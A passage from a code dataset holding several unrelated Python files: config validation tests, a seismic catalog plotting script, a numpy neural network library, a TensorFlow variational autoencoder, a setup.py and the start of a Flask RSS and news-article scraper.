test_invalid_bootstrap_url():\n validate_error(\n {'bootstrap_url': '123abc/'},\n 'bootstrap_url',\n \"Must not end in a '/'\")\n\n\ndef test_validate_duplicates():\n validate_error(\n {'master_list': '[\"10.0.0.1\", \"10.0.0.2\", \"10.0.0.1\"]'},\n 'master_list',\n 'List cannot contain duplicates: 10.0.0.1 appears 2 times')\n\n\ndef test_invalid_oauth_enabled():\n validate_error(\n {'oauth_enabled': 'foo'},\n 'oauth_enabled',\n true_false_msg)\n\n\ndef test_cluster_docker_credentials():\n validate_error(\n {'cluster_docker_credentials': 'foo'},\n 'cluster_docker_credentials',\n \"Must be valid JSON. Got: foo\")\n\n validate_error(\n {'cluster_docker_credentials_dcos_owned': 'foo'},\n 'cluster_docker_credentials_dcos_owned',\n true_false_msg)\n\n# TODO(cmaloney): Add tests that specific config leads to specific files in specific places at install time.\n","sub_path":"tests/test_gen_validation.py","file_name":"test_gen_validation.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"141612698","text":"\"\"\" Plot catalog comparison\n\"\"\"\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport config\nfrom reader import read_ctlg, slice_ctlg\nfrom statis_lib import calc_fmd\n\n# read & filter catalog\ndef get_mag_ot(ctlg_path):\n events = read_ctlg(ctlg_path)\n events = slice_ctlg(events, mag_rng=mag_rng)\n mag = np.array(list(events['mag']))\n ot = [oti.datetime for oti in events['ot']]\n return mag, ot\n\n\n# catalog info\ncfg = config.Config_Cmp()\nmag_rng = cfg.mag_rng\nctlg_list = cfg.ctlg_list\nmags, ots = [], []\nfor ctlg in ctlg_list:\n magi, oti = get_mag_ot(ctlg)\n mags.append(magi)\n ots.append(oti)\n\n# plot config\nname_list = cfg.name_list\ncolor_list = cfg.color_list\nfig_title_fmd = cfg.fig_title_fmd\nfig_title_mt = cfg.fig_title_mt\nfsize_label = cfg.fsize_label\nfsize_title = cfg.fsize_title\nmark_size = cfg.mark_size\nalpha_fmd = cfg.alpha_fmd\nalpha_mt = cfg.alpha_mt\nmark_num = cfg.mark_num\nmark_cum = cfg.mark_cum\n\n\n# 1. plot FMD \nplt.figure()\np_list = []\nfor i in range(len(mags)):\n mag_bin, num, cum_num = calc_fmd(mags[i])\n pi = plt.semilogy(mag_bin, num, mark_num, markersize=mark_size, color=color_list[i], alpha=alpha_fmd)\n pi+= plt.semilogy(mag_bin, cum_num, mark_cum, markersize=mark_size, color=color_list[i], alpha=alpha_fmd)\n p_list.append(pi[0])\nplt.legend(p_list, name_list, fontsize=fsize_label)\nplt.xlabel('Magnitude', fontsize=fsize_label)\nplt.ylabel('Number', fontsize=fsize_label)\nax = plt.gca()\nplt.setp(ax.xaxis.get_majorticklabels(), fontsize=fsize_label)\nplt.setp(ax.yaxis.get_majorticklabels(), fontsize=fsize_label)\nplt.title(fig_title_fmd, fontsize=fsize_title)\n\n# 2. plot M-t\nplt.figure()\nax = plt.gca()\np_list = []\nfor i in range(len(mags)):\n pi = plt.scatter(ots[i], mags[i], color=color_list[i], alpha=alpha_mt)\n p_list.append(pi)\nplt.legend(p_list, name_list, fontsize=fsize_label)\nplt.setp(ax.xaxis.get_majorticklabels(), fontsize=fsize_label, rotation=20)\nplt.setp(ax.yaxis.get_majorticklabels(), fontsize=fsize_label)\nplt.ylabel('Magnitude', fontsize=fsize_label)\nplt.title(fig_title_mt, fontsize=fsize_title)\nplt.show()\n\n","sub_path":"plot_cmp.py","file_name":"plot_cmp.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"610771334","text":"import logging\nfrom flask_restful import marshal_with, fields\nfrom flask import request\nfrom api.Auth import Resource\n\nroot_fields = {\n \"uri_data_set\": fields.Url(\"dataSetList\", scheme=\"http\"),\n \"uri_twitter_consumer\": fields.Url(\"twitterConsumerList\", scheme=\"http\"),\n \"uri_data_service\": fields.Url(\"dataServiceList\", scheme=\"http\"),\n \"uri_analysis_options\": fields.Url(\"analyticsOptions\", scheme=\"http\"),\n \"uri_slides\": fields.Url(\"slideList\", scheme=\"http\"),\n \"msg\": fields.String,\n \"healthy\": fields.Boolean\n}\n\n\nclass RootResource(Resource):\n logger = logging.getLogger(__name__)\n\n @marshal_with(root_fields)\n def get(self):\n\n address = request.remote_addr\n return {\"msg\": \"Connected to the GDO Twitter API\", \"healthy\":True}\n","sub_path":"server/src/api/Resources/Root.py","file_name":"Root.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"77770110","text":"from Tkinter import *\n\n\ndef openInstallWindow():\n\tinstallwin = Tk()\n\tinstallwin.wm_title(\"Modification Installer\")\n\tframe = Frame(installwin, height=640, width=480)\n\tframe.pack_propagate(0)\n\tframe.pack(padx=10, pady=10, expand=1)\n\n\t\n\t\n","sub_path":"startMC/Modifdepinstall.py","file_name":"Modifdepinstall.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"45905665","text":"import numpy as np\nimport pickle\n# GO ON\ndef xavier_init(size, gain=1.0):\n \"\"\"\n Xavier initialization of network weights.\n \"\"\"\n low = -gain * np.sqrt(6.0 / np.sum(size))\n high = gain * np.sqrt(6.0 / np.sum(size))\n return np.random.uniform(low=low, high=high, size=size)\n\n\nclass Layer:\n \"\"\"\n Abstract layer class.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n raise NotImplementedError()\n\n def forward(self, *args, **kwargs):\n raise NotImplementedError()\n\n def __call__(self, *args, **kwargs):\n return self.forward(*args, **kwargs)\n\n def backward(self, *args, **kwargs):\n raise NotImplementedError()\n\n def update_params(self, *args, **kwargs):\n pass\n\n\nclass MSELossLayer(Layer):\n \"\"\"\n MSELossLayer: Computes mean-squared error between y_pred and y_target.\n \"\"\"\n\n def __init__(self):\n self._cache_current = None\n\n @staticmethod\n def _mse(y_pred, y_target):\n return np.mean((y_pred - y_target) ** 2)\n\n @staticmethod\n def _mse_grad(y_pred, y_target):\n return 2 * (y_pred - y_target) / len(y_pred)\n\n def forward(self, y_pred, y_target):\n self._cache_current = y_pred, y_target\n return self._mse(y_pred, y_target)\n\n def backward(self):\n return self._mse_grad(*self._cache_current)\n\n\nclass CrossEntropyLossLayer(Layer):\n \"\"\"\n CrossEntropyLossLayer: Computes the softmax followed by the negative log-\n likelihood loss.\n \"\"\"\n\n def __init__(self):\n self._cache_current = None\n\n @staticmethod\n def softmax(x):\n numer = np.exp(x - x.max(axis=1, keepdims=True))\n denom = numer.sum(axis=1, keepdims=True)\n return numer / denom\n\n def forward(self, inputs, y_target):\n assert len(inputs) == len(y_target)\n n_obs = len(y_target)\n probs = self.softmax(inputs)\n self._cache_current = y_target, probs\n\n out = -1 / n_obs * np.sum(y_target * np.log(probs))\n return out\n\n def backward(self):\n y_target, probs = self._cache_current\n n_obs = len(y_target)\n return -1 / n_obs * (y_target - probs)\n\n\nclass SigmoidLayer(Layer):\n \"\"\"\n SigmoidLayer: Applies sigmoid function elementwise.\n \"\"\"\n\n def __init__(self):\n self._cache_current = None\n\n def forward(self, x):\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n self._cache_current = 1/(1 + np.exp(-x))\n\n return self._cache_current\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def backward(self, grad_z):\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n #Differential of the sigmoid function\n self.f_prime = self._cache_current * (1 - self._cache_current)\n grad_loss_wrt_inputs = grad_z * self.f_prime\n\n return(grad_loss_wrt_inputs)\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n\nclass ReluLayer(Layer):\n \"\"\"\n ReluLayer: Applies Relu function elementwise.\n \"\"\"\n\n def __init__(self):\n self._cache_current = None\n\n def forward(self, x):\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n self._cache_current = np.maximum(np.zeros_like(x), x)\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n return self._cache_current\n\n def backward(self, grad_z):\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Diferential of the Relu function\n self.f_prime = self._cache_current.copy()\n self.f_prime[self.f_prime<0] = 0\n self.f_prime[self.f_prime>0] = 1\n\n grad_loss_wrt_inputs = grad_z * self.f_prime\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n return(grad_loss_wrt_inputs)\n\n\nclass LinearLayer(Layer):\n \"\"\"\n LinearLayer: Performs affine transformation of input.\n \"\"\"\n\n def __init__(self, n_in, n_out):\n \"\"\"Constructor.\n\n Arguments:\n n_in {int} -- Number (or dimension) of inputs.\n n_out {int} -- Number (or dimension) of outputs.\n \"\"\"\n self.n_in = n_in\n self.n_out = n_out\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n self._W = np.reshape(xavier_init((self.n_in * self.n_out)), (self.n_in, self.n_out))\n self._b = np.reshape(np.random.randn((self.n_out)), (1, self.n_out))\n\n self._cache_current = None\n self._grad_W_current = None\n self._grad_b_current = None\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def forward(self, x):\n \"\"\"\n Performs forward pass through the layer (i.e. returns Wx + b).\n\n Logs information needed to compute gradient at a later stage in\n `_cache_current`.\n\n Arguments:\n x {np.ndarray} -- Input array of shape (batch_size, n_in).\n\n Returns:\n {np.ndarray} -- Output array of shape (batch_size, n_out)\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n self.batch_size = x.shape[0]\n self._cache_current = x\n #Matrix multiplication for to go forward through the linear layer\n return (np.matmul(x, self._W) + self._b)\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def backward(self, grad_z):\n \"\"\"\n Given `grad_z`, the gradient of some scalar (e.g. loss) with respect to\n the output of this layer, performs back pass through the layer (i.e.\n computes gradients of loss with respect to parameters of layer and\n inputs of layer).\n\n Arguments:\n grad_z {np.ndarray} -- Gradient array of shape (batch_size, n_out).\n\n Returns:\n {np.ndarray} -- Array containing gradient with repect to layer\n input, of shape (batch_size, n_in).\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n x = self._cache_current\n\n self._grad_W_current = np.matmul(x.T, grad_z)\n self._grad_b_current = np.matmul(np.ones((1, self.batch_size)), grad_z)\n\n grad_loss_wrt_inputs = np.matmul(grad_z, self._W.T)\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n return(grad_loss_wrt_inputs)\n\n def update_params(self, learning_rate):\n \"\"\"\n Performs one step of gradient descent with given learning rate on the\n layer's parameters using currently stored gradients.\n\n Arguments:\n learning_rate {float} -- Learning rate of update step.\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Gradient descent for the weights and bias respectively\n self._W -= learning_rate*self._grad_W_current\n self._b -= learning_rate*self._grad_b_current\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\nclass MultiLayerNetwork(object):\n \"\"\"\n MultiLayerNetwork: A network consisting of stacked linear layers and\n activation functions.\n \"\"\"\n\n def __init__(self, input_dim, neurons, activations):\n \"\"\"Constructor.\n\n Arguments:\n input_dim {int} -- Dimension of input (excluding batch dimension).\n neurons {list} -- Number of neurons in each layer represented as a\n list (the length of the list determines the number of layers).\n activations {list} -- List of the activation function to use for\n each layer.\n \"\"\"\n self.input_dim = input_dim # D\n self.neurons = neurons # L\n self.activations = activations # L\n\n self._layers = [] #list of all the layes\n self.index_linear_layer = [] #position of all the linear layers\n self.feature_list = [self.input_dim] + self.neurons #list of neurons per layer including the input\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n for index, feature in enumerate(self.neurons):\n\n self.index_linear_layer.append(len(self._layers)) #getting the postion of the linear layers\n #Linear layer with the corresponding input and output dimensions\n self._layers.append(LinearLayer(self.feature_list[index],self.feature_list[index+1]))\n\n #Creating the layer instance corresponding to the activation function\n if self.activations[index] == \"relu\":\n self._layers.append(ReluLayer())\n elif self.activations[index] == \"sigmoid\":\n self._layers.append(SigmoidLayer())\n elif self.activations[index] == \"identity\":\n continue\n else:\n raise AssertionError(\"Wrong activation function\")\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n\n def forward(self, x):\n \"\"\"\n Performs forward pass through the network.\n\n Arguments:\n x {np.ndarray} -- Input array of shape (batch_size, input_dim).\n\n Returns:\n {np.ndarray} -- Output array of shape (batch_size,\n #_neurons_in_final_layer)\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Forwards through all the layers\n for i in range(len(self._layers)):\n x = self._layers[i].forward(x)\n return x\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def __call__(self, x):\n \"\"\"\n Method to call the forward class from MultiLayer\n \"\"\"\n return self.forward(x)\n\n def backward(self, grad_z):\n \"\"\"\n Performs backward pass through the network.\n\n Arguments:\n grad_z {np.ndarray} -- Gradient array of shape (1,\n #_neurons_in_final_layer).\n\n Returns:\n {np.ndarray} -- Array containing gradient with repect to layer\n input, of shape (batch_size, input_dim).\n \"\"\"\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Backpropagation through all the layers\n for layer_n in range(len(self._layers)-1,-1,-1):\n grad_z = self._layers[layer_n].backward(grad_z)\n return grad_z #RETURNS GRADIENT OF FUNC WRT TO INPUTS\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def update_params(self, learning_rate):\n \"\"\"\n Performs one step of gradient descent with given learning rate on the\n parameters of all layers using currently stored gradients.\n\n Arguments:\n learning_rate {float} -- Learning rate of update step.\n \"\"\"\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Parameters update performed on the linear layers only\n for layer_n in range(len(self._layers)-1,-1,-1):\n if layer_n in self.index_linear_layer:\n self._layers[layer_n].update_params(learning_rate)\n else:\n continue\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n\ndef save_network(network, fpath):\n \"\"\"\n Utility function to pickle `network` at file path `fpath`.\n \"\"\"\n with open(fpath, \"wb\") as f:\n pickle.dump(network, f)\n\n\ndef load_network(fpath):\n \"\"\"\n Utility function to load network found at file path `fpath`.\n \"\"\"\n with open(fpath, \"rb\") as f:\n network = pickle.load(f)\n return network\n\n\nclass Trainer(object):\n \"\"\"\n Trainer: Object that manages the training of a neural network.\n \"\"\"\n\n def __init__(\n self,\n network,\n batch_size,\n nb_epoch,\n learning_rate,\n loss_fun,\n shuffle_flag\n ):\n \"\"\"Constructor.\n\n Arguments:\n network {MultiLayerNetwork} -- MultiLayerNetwork to be trained.\n batch_size {int} -- Training batch size.\n nb_epoch {int} -- Number of training epochs.\n learning_rate {float} -- SGD learning rate to be used in training.\n loss_fun {str} -- Loss function to be used. Possible values: mse,\n bce.\n shuffle_flag {bool} -- If True, training data is shuffled before\n training.\n \"\"\"\n self.multilayer_network = network\n self.batch_size = batch_size\n self.nb_epoch = nb_epoch\n self.learning_rate = learning_rate\n self.loss_fun = loss_fun\n self.shuffle_flag = shuffle_flag\n\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n if self.loss_fun is 'mse':\n self._loss_layer = MSELossLayer()\n elif self.loss_fun is 'cross_entropy':\n self._loss_layer = CrossEntropyLossLayer()\n else:\n raise Exception('Wrong Loss, chose between: mse, cross_entropy')\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n @staticmethod\n def shuffle(input_dataset, target_dataset):\n \"\"\"\n Returns shuffled versions of the inputs.\n\n Arguments:\n - input_dataset {np.ndarray} -- Array of input features, of shape\n (#_data_points, n_features).\n - target_dataset {np.ndarray} -- Array of corresponding targets, of\n shape (#_data_points, ).\n\n Returns: 2-tuple of np.ndarray: (shuffled inputs, shuffled_targets).\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Reshaping to use the create indices and shuffle the array\n if target_dataset.shape == (input_dataset.shape[0],):\n target_dataset = target_dataset.reshape(input_dataset.shape[0], 1)\n\n #Creating of shuffled indices to shuffle the full dataset\n indices = np.random.permutation(input_dataset.shape[0])\n\n shuffled_inputs = input_dataset[indices,:]\n shuffled_targets = target_dataset[indices,:]\n\n #Reshaping to comply with teh LabTS tests\n if shuffled_targets.shape == (input_dataset.shape[0], 1):\n shuffled_targets = shuffled_targets.reshape(input_dataset.shape[0],)\n\n return (shuffled_inputs, shuffled_targets)\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def train(self, input_dataset, target_dataset):\n \"\"\"\n Main training loop. Performs the following steps `nb_epoch` times:\n - Shuffles the input data (if `shuffle` is True)\n - Splits the dataset into batches of size `batch_size`.\n - For each batch:\n - Performs forward pass through the network given the current\n batch of inputs.\n - Computes loss.\n - Performs backward pass to compute gradients of loss with\n respect to parameters of network.\n - Performs one step of gradient descent on the network\n parameters.\n\n Arguments:\n - input_dataset {np.ndarray} -- Array of input features, of shape\n (#_training_data_points, n_features).\n - target_dataset {np.ndarray} -- Array of corresponding targets, of\n shape (#_training_data_points, ).\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Finding the number of batches based on the batch size\n n_batches = np.floor(input_dataset.shape[0]/self.batch_size).astype(int)\n\n for epoch in range(self.nb_epoch):\n\n #Reshaping in case of single input\n if input_dataset.shape == (input_dataset.shape[0],):\n input_dataset = input_dataset.reshape(input_dataset.shape[0], 1)\n\n if self.shuffle_flag:\n input_dataset,target_dataset = self.shuffle(input_dataset,target_dataset)\n\n #Reshaping to use hstack\n if target_dataset.shape == (input_dataset.shape[0],):\n target_dataset = target_dataset.reshape(input_dataset.shape[0], 1)\n\n #Splitting into the n batches\n data = np.hstack((input_dataset,target_dataset))\n batch_list = np.vsplit(data[:int(n_batches*self.batch_size)],n_batches)\n #Adding the remainder datapoints to the last batch\n if int(n_batches*self.batch_size) != data.shape[0]:\n batch_list.append(data[int(n_batches*self.batch_size):])\n\n #Performing backpropagation and paramters update\n for batch in batch_list:\n loss = self.eval_loss(batch[:,:-target_dataset.shape[1]],batch[:,-target_dataset.shape[1]:])\n #loss_arr.append(loss) ##TO BE TAKEN OFF ONCE NOT TESTING ANYMORE\n\n self.multilayer_network.backward(self.grad_z)\n self.multilayer_network.update_params(self.learning_rate)\n\n return\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def eval_loss(self, input_dataset, target_dataset):\n \"\"\"\n Function that evaluate the loss function for given data.\n\n Arguments:\n - input_dataset {np.ndarray} -- Array of input features, of shape\n (#_evaluation_data_points, n_features).\n - target_dataset {np.ndarray} -- Array of corresponding targets, of\n shape (#_evaluation_data_points, ).\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n #Going through the network\n prediction = self.multilayer_network.forward(input_dataset)\n\n #Computing the loss and the gradient with repect to the final outputs\n loss = self._loss_layer.forward(prediction, target_dataset)\n self.grad_z = self._loss_layer.backward()\n\n return loss\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n\nclass Preprocessor(object):\n \"\"\"\n Preprocessor: Object used to apply \"preprocessing\" operation to datasets.\n The object can also be used to revert the changes.\n \"\"\"\n\n def __init__(self, data):\n \"\"\"\n Initializes the Preprocessor according to the provided dataset.\n (Does not modify the dataset.)\n\n Arguments:\n - data {np.ndarray} dataset used to determined the parameters for\n the normalization. DATA HAS FEATURES - X\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n #Axis 0 which corresponds to taking the max for each feature\n self.max_data = np.max(data, axis = 0)\n self.min_data = np.min(data, axis = 0)\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def apply(self, data):\n \"\"\"\n Apply the pre-processing operations to the provided dataset.\n\n Arguments:\n - data {np.ndarray} dataset to be normalized.\n\n Returns:\n {np.ndarray} normalized dataset.\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n\n return (data - self.min_data)/(self.max_data - self.min_data)\n\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n def revert(self, normalised_data):\n \"\"\"\n Revert the pre-processing operations to retreive the original dataset.\n\n Arguments:\n - data {np.ndarray} dataset for which to revert normalization.\n\n Returns:\n {np.ndarray} reverted dataset.\n \"\"\"\n #######################################################################\n # ** START OF YOUR CODE **\n #######################################################################\n return self.min_data + normalised_data*(self.max_data - self.min_data)\n #######################################################################\n # ** END OF YOUR CODE **\n #######################################################################\n\n\ndef example_main():\n input_dim = 4\n neurons = [2,3]\n activations = ['relu','sigmoid']\n net = MultiLayerNetwork(input_dim, neurons, activations)\n\n dat = np.loadtxt(\"iris.dat\")\n np.random.shuffle(dat)\n\n x = dat[:, :4]\n y = dat[:, 4:]\n\n split_idx = int(0.8 * len(x))\n\n x_train = x[:split_idx]\n y_train = y[:split_idx]\n x_val = x[split_idx:]\n y_val = y[split_idx:]\n\n prep_input = Preprocessor(x_train)\n\n x_train_pre = prep_input.apply(x_train)\n x_val_pre = prep_input.apply(x_val)\n\n trainer = Trainer(\n network=net,\n batch_size=8,\n nb_epoch=4000,\n learning_rate=0.01,\n loss_fun=\"cross_entropy\",\n shuffle_flag=True,\n )\n\n trainer.train(x_train_pre, y_train)\n print(\"Train loss = \", trainer.eval_loss(x_train_pre, y_train))\n print(\"Validation loss = \", trainer.eval_loss(x_val_pre, y_val))\n\n preds = net(x_val_pre).argmax(axis=1).squeeze()\n targets = y_val.argmax(axis=1).squeeze()\n accuracy = (preds == targets).mean()\n print(\"Validation accuracy: {}\".format(accuracy))\n\n\nif __name__ == \"__main__\":\n example_main()\n","sub_path":"nn_lib.py","file_name":"nn_lib.py","file_ext":"py","file_size_in_byte":26114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"566730006","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport os\nfrom utils import *\n\n\nclass VariantionalAutoencoder(object):\n def __init__(self, latent_dim, image_dim=28 * 28):\n self.latent_dim = latent_dim\n self.learning_rate = 1e-2\n\n self.image_dim = image_dim\n\n self.build_model()\n\n def build_model(self):\n self.x = tf.placeholder(name='x', dtype=tf.float32, shape=[None, self.image_dim])\n\n # Gaussian MLP as encoder\n with tf.variable_scope(\"gaussian_MLP_encoder\"):\n he1 = tf.layers.dense(self.x, 256, activation=tf.nn.relu)\n he2 = tf.layers.dense(he1, 256, activation=tf.nn.relu)\n z_mu = tf.layers.dense(he2, self.latent_dim, activation=None)\n z_log_sigma = tf.layers.dense(he2, self.latent_dim, activation=None)\n\n eps = tf.random_normal(tf.shape(z_mu), 0, 1, dtype=tf.float32)\n self.z = z_mu + tf.exp(z_log_sigma * 0.5) * eps\n\n # Bernoulli MLP as decoder\n with tf.variable_scope(\"bernoulli_MLP_decoder\"):\n hd1 = tf.layers.dense(self.z, 256, activation=tf.nn.relu)\n hd2 = tf.layers.dense(hd1, 256, activation=tf.nn.relu)\n self.x_hat = tf.layers.dense(hd2, self.image_dim, activation=tf.nn.sigmoid)\n\n with tf.variable_scope(\"loss\"):\n # Reconstruction loss\n # Minimize the cross-entropy loss\n # H(x, x_hat) = -\\Sigma x*log(x_hat) + (1-x)*log(1-x_hat)\n recon_loss = tf.reduce_sum(tf.losses.log_loss(self.x, self.x_hat, reduction=\"none\"), axis=1)\n self.recon_loss = tf.reduce_mean(recon_loss)\n\n # Latent loss\n # Kullback Leibler divergence: measure the difference between two distributions\n # Here we measure the divergence between the latent distribution and N(0, 1)\n latent_loss = -0.5 * tf.reduce_sum(\n 1 + z_log_sigma - tf.square(z_mu) - tf.exp(z_log_sigma), axis=1)\n\n self.latent_loss = tf.reduce_mean(latent_loss)\n self.total_loss = tf.reduce_mean(recon_loss + latent_loss)\n self.train_op = tf.train.AdamOptimizer(\n learning_rate=self.learning_rate).minimize(self.total_loss)\n\n\ndef main():\n batch_size = 128\n latent_dim = 100\n\n f_mnist = input_data.read_data_sets('../data/fashion_mnist', one_hot=True)\n\n vae = VariantionalAutoencoder(latent_dim)\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n if not os.path.exists('out/'):\n os.makedirs('out/')\n\n i = 0\n for it in range(100000):\n if it % 1000 == 0:\n samples = sess.run(vae.x_hat, feed_dict={vae.z: sample_z(16, latent_dim)})\n\n fig = plot(samples)\n plt.savefig('out/{}.png'.format(str(i).zfill(3)), bbox_inches='tight')\n i += 1\n plt.close(fig)\n\n x_image, _ = f_mnist.train.next_batch(batch_size)\n\n _, loss, recon_loss, latent_loss = sess.run(\n [vae.train_op, vae.total_loss, vae.recon_loss, vae.latent_loss],\n feed_dict={vae.x: x_image}\n )\n\n if it % 1000 == 0:\n print('[Iter {}] Loss: {}, Recon loss: {}, Latent loss: {}'.format(\n it, loss, recon_loss, latent_loss))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"vae/vae_fashion_mnist.py","file_name":"vae_fashion_mnist.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"596682100","text":"from setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nimport csmash\n\nrequirements = [\n 'PasteDeploy'\n]\n\ntest_requirements = [\n 'virtualenv == 1.7.1.2',\n 'tox == 1.3',\n 'pytest == 2.2.4',\n 'pylint == 0.25.1',\n 'pytest-pep8 == 0.8',\n]\n\n\nclass ToxTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n from pylint.lint import Run\n Run(['csmash', '--reports=n', '--include-ids=y'], exit=False)\n import tox\n tox.cmdline(args=[])\n\n\nsetup(\n name=\"configsmash\",\n version=csmash.__version__,\n author=\"Robby Ranshous\",\n author_email=\"rranshous@gmail.com\",\n description=(\"python lib / script for reading\"\n \" cascading sets of ini files\"),\n keywords=\"configuration\",\n url=\"https://github.com/rranshous/configsmash\",\n py_modules=[\"csmash\"],\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Topic :: Utilities\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.2\",\n ],\n install_requires=requirements,\n tests_require=test_requirements,\n cmdclass={\n 'test': ToxTest,\n },\n entry_points={\n 'console_scripts': [\n 'csmash = csmash:cli',\n ]\n },\n)\n","sub_path":"pypi_install_script/configsmash-0.0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"492649144","text":"from flask import Flask, request, jsonify, redirect, url_for\nfrom flask_cors import CORS, cross_origin\nimport json\nfrom views import index\nimport sys\nimport json\nfrom time import mktime\nimport nltk\nfrom datetime import datetime\nimport feedparser as fp\nimport newspaper\nfrom newspaper import Article\nnltk.download('punkt')\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS']='Content-Type'\n\n@app.route(\"/\")\n@cross_origin()\ndef pg():\n index()\n return \"k\"\n\n### NEWS PAPER SCRAPING\n\ndata = {}\ndata[\"newspapers\"] = {}\nmax_articles_from_single_source_limit = 10\n\ndef parse_config(fname):\n # Loads the JSON files with news sites\n with open(fname, \"r\") as data_file:\n cfg = json.load(data_file)\n\n for company, value in cfg.items():\n if \"link\" not in value:\n raise ValueError(f\"Configuration item {company} missing obligatory 'link'.\")\n\n return cfg\n\n\ndef _handle_rss(company, value, count, limit):\n \"\"\"If a RSS link is provided in the JSON file, this will be the first\n choice. If you do not want to scrape from the RSS-feed, just leave the RSS\n attr empty in the JSON file.\n \"\"\"\n\n fpd = fp.parse(value[\"rss\"])\n # print(f\"Downloading articles from {company}\")\n news_paper = {\"rss\": value[\"rss\"], \"link\": value[\"link\"], \"articles\": []}\n for entry in fpd.entries:\n # Check if publish date is provided, if no the article is\n # skipped. This is done to keep consistency in the data and to\n # keep the script from crashing.\n if not hasattr(entry, \"published\"):\n continue\n if count > limit:\n break\n article = {}\n article[\"link\"] = entry.link\n date = entry.published_parsed\n article[\"published\"] = datetime.fromtimestamp(mktime(date)).isoformat()\n try:\n content = Article(entry.link)\n content.download()\n content.parse()\n except Exception as err:\n # If the download for some reason fails (ex. 404) the\n # script will continue downloading the next article.\n print(err)\n print(\"continuing...\")\n continue\n article[\"title\"] = content.title\n article[\"text\"] = content.text\n article[\"keywords\"] = content.keywords\n article[\"top_image\"] = content.top_image\n news_paper[\"articles\"].append(article)\n # print(f\"{count} articles downloaded from {company}, url: {entry.link}\")\n count = count + 1\n return count, news_paper\n\n\ndef _handle_fallback(company, value, count, limit):\n \"\"\"This is the fallback method that uses the python newspaper library \n to extract articles if a RSS-feed link is not provided.\"\"\"\n\n # print(f\"Building site for {company}\")\n paper = newspaper.build(value[\"link\"], memoize_articles=False)\n news_paper = {\"link\": value[\"link\"], \"articles\": []}\n none_type_count = 0\n for content in paper.articles:\n if count > limit:\n break\n try:\n content.download()\n content.parse()\n content.nlp()\n except Exception as err:\n print(err)\n print(\"continuing...\")\n continue\n # If there is no found publish date the article will be skipped.\n # After 10 downloaded articles from the same newspaper without publish date, the company will be skipped.\n if content.publish_date is None:\n # print(f\"{count} Article has date of type None...\")\n none_type_count = none_type_count + 1\n if none_type_count > 10:\n # print(\"Too many noneType dates, aborting...\")\n none_type_count = 0\n break\n count = count + 1\n continue\n article = {\n 